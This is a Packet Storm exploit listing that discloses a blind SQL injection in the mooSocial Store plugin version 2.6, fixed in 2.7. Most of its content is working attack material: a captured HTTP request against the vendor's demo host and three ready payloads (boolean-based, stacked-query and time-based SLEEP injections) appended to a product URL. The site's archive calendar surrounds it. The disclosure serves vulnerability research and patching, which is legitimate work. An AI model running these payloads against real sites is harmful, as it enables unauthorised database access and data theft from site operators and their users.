what you don't know can hurt you

mooSocial Store 2.6 SQL Injection

mooSocial Store 2.6 SQL Injection
Posted Sep 4, 2018
Authored by Andrea Bocchetti

mooSocial Store plugin version 2.6 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 88047c637215ff023f411a46712a9bcc

mooSocial Store 2.6 SQL Injection

Change Mirror Download
# Exploit Title: mooSocial Store Plugin 2.6 - SQL Injection
# Exploit Author: Andrea Bocchetti
# Date: 2018-08-28
# Google Dork: N/A -
# Vendor: https://moosocial.com/product/store-plugins/
# Software Link: https://moosocial.com/product/store-plugins/
# Demo URL: http://addons.moosocial.com/stores
# Purchase link: https://moosocial.com/addons/
# Affected Version: all versions
# Patched Version: 2.7
# Category: Web Application
# Platform: PHP
# Tested on: Ubuntu
# CVE: N/A

# 1. Technical Description:
# mooSocial Store Plugin is affected by Blind SQL Injection in the product parameter used with URL Rewrite

GET /stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 HTTP/1.1
Host: addons.moosocial.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: CAKEPHP=2b0v0a2360nhl46psmm1mejsi7
Connection: close
Upgrade-Insecure-Requests: 1


# 3. Payload:

# Parameter: #1* (URI)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 AND 5011=5011

# Type: stacked queries
# Title: MySQL > 5.0.11 stacked queries (comment)
# Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65;SELECT SLEEP(5)#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind

Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 AND SLEEP(5)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    1 Files
  • 17
    Nov 17th
    3 Files
  • 18
    Nov 18th
    22 Files
  • 19
    Nov 19th
    17 Files
  • 20
    Nov 20th
    15 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close